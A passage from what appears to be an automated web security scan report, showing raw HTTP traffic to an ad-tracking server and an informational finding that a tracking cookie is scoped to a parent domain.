NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=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; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wC6LifrWDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab1kEEVPU2fUru16M3xQvK5h6DjhbsoxFL9mZy09tkwF3zMBONWLPim13tsUnt7y69yzn/pSli2dtkys7CO8F3vwD23Obc5M84e0F+4OWToqI5U+iuxfrQum9nIiRd2EdAjsXZsS41o28OPIcenEsUMSn+MsLgO4utwMWb/gE19ZEZ+7Ot/G27s5beAFkpt9FQASU1A5Lu3ULxo3lbYGgV6MFCUCrVv8xEHDR0OFlm/47okBFL0wlBrlog373wzClLQhAbQoO0+2UuWEYpSvTjCFqM+n7k464+nj4RHWUL0HkiAP3WW8mHmr5tn8BPHjSzh2R45K8zzNt4x7Pz2G9LIE+LutegUEe4cqMvHqEL4HDO0NhaQd/HGUMt7Ljd5wmA0uidQbZMwJ7rXA6uu7xOJVwP/42+Qz21vnfo2+WIMTRcT7NpLum2bfS05FsCLt9vqw2qTvpMtbkArqLW7xFGhhI8G6/A9z9lC9YD0J873eBPJSc0b1HGDVw1zWDrX5plbwP6fxFss2/w7FZu8oCPE=; rsiPus_7Fof="MLsXsqUO7zpnJREx00VEzEBABbNqBiOHnplL7OTUWJpShyDdYUskCCby7XQh/tgaS4vZb2QP7yKOnBhZWyZhYH902/1jEPoGOaMCH3AeK0qoswv+iVRP8i9Berd3Drg9GfKKHskMyx8HwWxiCQqCkqq6/aySSaWBOt+V27gesXuNlhdPzpJezQYMhA3KYgtJYM7yZpTKDon+raVGhU7ZsHK5bxQpqYzFmiIaxSpVWfiFh9LhrJ5JpaBFUzV8hKefb33Q1qBPIxcZmSx+3JJJEdAfrqZIDxptbRrXNiyRt5mTcZGXBQutg9XhRIUk3bNpyl0Hap2iSwGl6wu+Tll4QWnJqkypoJsOkaAG7hqr7Enm52WWLmhjnRG8ScCb6AZ1HI7iVW3LwR627/uGMmfRFmo4GRVN8yEXAud4lJDdgXmDmFdDwNSmN3YfFblrBYSvCWdcsgZWwBzasfUFADFBoioaPRG01lvjEIHJxKZx8glrbAzUFeZi2liQCG+SnL5DwKs22pOFvKvHu0bTVVFCwFNfU0NMXNrwmmNCREBacd8PFnP3k98izGOzUrfid2TyJzSIRuiqurzo9j08911ufserY40T1cT1QDRaLSCBlPtbSsFiXt74G57AeRuKcZT3idOnPDOp4yPobEG39luXCdahtrVpjqvlDjbjeHB950xiLwjdfFAaXFlYWYrGjPUXxseXq63MQchr2+igu0nazhf/EZPISu1y5EVH+GY5T3YADWyyWSZCE9xb0K97TULzILKlPtqGbtmKiMqPMZvDUKy6+L8c4M5hL4MmqHF8Svo2Pm88aD6LXuv25cpecgsAHJc+oknOG3UZHT7leBfap7pylpBmR78vmNe4rTftV6ofS8A7aWcERrb/jevyoXwzQVhEGj5q9Z2+BgQ9RI0C8TDG3cBHFuZa35+MkzvTTzN8g04GFI22P/fZIMB16pcSMeRFUJsjJWM8ayA+UPXiSi7LxksutHmh7Rsiz3Q9DfAhCd6Cdtk08fPYaTgJK9s="; rsi_us_1000000="pUMdIz9HMAYU1O2W4w59lYbtBv51KSuCATfyv8rDvhNFI4lyOEzFJaxdoOQHZdvylzp5wP+gueEuDdsfsB/epKrwaw52oIZ7FzkNSnd/QjczjAmTuRPcfJHfyFPuGAVdgSXcyP8gsWBJA5SO3lrpNe8mN3yP8CwpSTek9yzVSicajSi4QdCv7bv0To3UjYkPoBq6blf2lGfvYsY3vIXLYF44Ckqqv4n0vpWOHnbEseoBJm8T224sqbLvLqPiVOsTEFUWs3Nj3rrhh6lu4f23jMvnvUXbfrfWHuycyLJjwAbl6X2nb3DTs1KTvaH7wWzxDs/QUvoMzWx08Jss4F4YhvI7490v5DsTshJEcOrtsq02xQO2oXvNLu+/9cRevYXfx1ZcFwXMMU7/FmAbGy+ElYl3Ttv6WFqBOlR4bsNHQ6pxCz/5nOL+KGoplU616XNV8yRxqsv/lGIh1+WZJy6jMVKcz1X0iGdCklddZLp5Cep/fXf8tXyu4P8Hwi7SPWetkLfiTklynom6u0oLfpI/fhu8ymt73/Ufy3+Vun7CjIko1HtOrz/39IWYoeLdOSAan4JW2XhF5iSThMf1JaZaFNdgblpIDGmiwpbQFsSgTp5gt+6WxrVOxggnXRofTXzgdyiYTW17mF0y522O/FfToZ8+SqnNLydg6WhBExk6DhOinFA+dksZRSpc9BIWlm2V1FW7R6vy9+wZFiDAAvO8h0+gCYCfDFp6aEejfGCkJaS1qG21ZloIKE54UgkIlawZdYAeH1ITzuM+d/lKbQBH01UW6mQ46GQ1N6ziqoHNPcMtOj7GhFbIaOANLg1M5fFGMOFxsNc/7STsqEqEVDc//PEyQ4rS7LLFgeD0twuPI2JeWHR9QIE5e7j0jSGjlUIWLAYUyPR/QW0uN5wG2nItgNu+W8mmV2WHdv/Vzp5lcAnTj75rPN8g3pHOAd/U61nBQmEpiKlLxDpCiDub3UnGc09++AXtdxKtjaTSQ+afIVtrBFe4Cntg+oureovqU6Lh1EHRetb2KvVOoEHHPFX+Ur01m6qUYkhx+LzkCZ/Cr/x0VE2Ki4Y+BKNMghqGgmo0V7JPg9aqcyikET2p+3WHL2rkd8EkzwOtxEGOCdu67XkwlGU4n0pndRDqmnoPfPN4TFNcisYSRG9SSnvZUk+ml6SSeebMEC/p7MItZoYvxorUheWlGztgdFIB0hwRMRCQDqOgX7OuXaT8y1LfEb3duASuObxjX+Iu3HQnxapBCbTAgnU8GWTfRx9lBOFjM9JPW1Fd9FMkpyh4LlTkgvgwC5UziFsUR0XygArESZmq/CxA+G54ARyUWQtonUMz/3QopdO+c/hvgAhHv4L9ohEFI5Tk+XJzLsuAcVt5a8TjxxUUT81VrS/OZy8aCf70i3DTiEP4/YXD1Vasxa9dTDcEmuJxP1/6IHE6Zu15hRHqQitorp+pWaW+WqCQOVHNv5rys68FTaCJsxWHCNYIuU9kO5e8TgnjJ3Jyvv5BBj7ciZGeaher+iZokV1FDq4VLOTQ5j4JzAHzVBfg7e5G2RtSqjn7ux8YebhMQ2+pkhrcobcCI4UsWkdQCn7etPEC6L1tsC20Q/cK7sq93fcZCBsNdf4UzfbHIfMcJz16"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wC6LifrWDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab0cAaYOpnwIMBLA0IVDPklGA4cG8987irB0kMgiihI/CdBBO2IqsXUHg2YYHfbCkyKF/JXks5u+heEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxar0dCcOUA19iyGVNLDYDF86x87PdcgYejEsUMdc2duPgOIx4rC7FyfGZpR7epenDDvIYvU27qvwht6FQASYws3bEqTCb6mh0vFu5mv8ReFLS8QXn+IWxW7m5aAgGHm2bnArmy/4uwEVzAZjnz24jkctfnC4A0VAac2LfKNp8W5jT8vmBdwMvqFHxSlTsD0Kux9KykoJaPynhziwgDG6HPOPmv1RQG6jr4x5rAcBTMD+mTBWcemEZbFGGLDECy+LTFTwX48tMHCQtqJHmvfXKSJqSmaZfSJNT0KjhPHsowPx4UlxsgpWDUNgaFA4bycN5/BS3Q9yH+j7P99D2ro1KG/8HAzxoqTZa9cIyBFViRuBpETRngEAkIHFvjISsC/NlRFmF89GpPKG9QLdIB4xAvr2lY7fC7DH/GHCA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:28:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 11:28:24 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.205. http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/91490024.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05ZbNqmtVtCSg/DW3ynPdQrdHYXITnLz/IiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkOfiLGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9dux2RNNY=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/91490024.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8O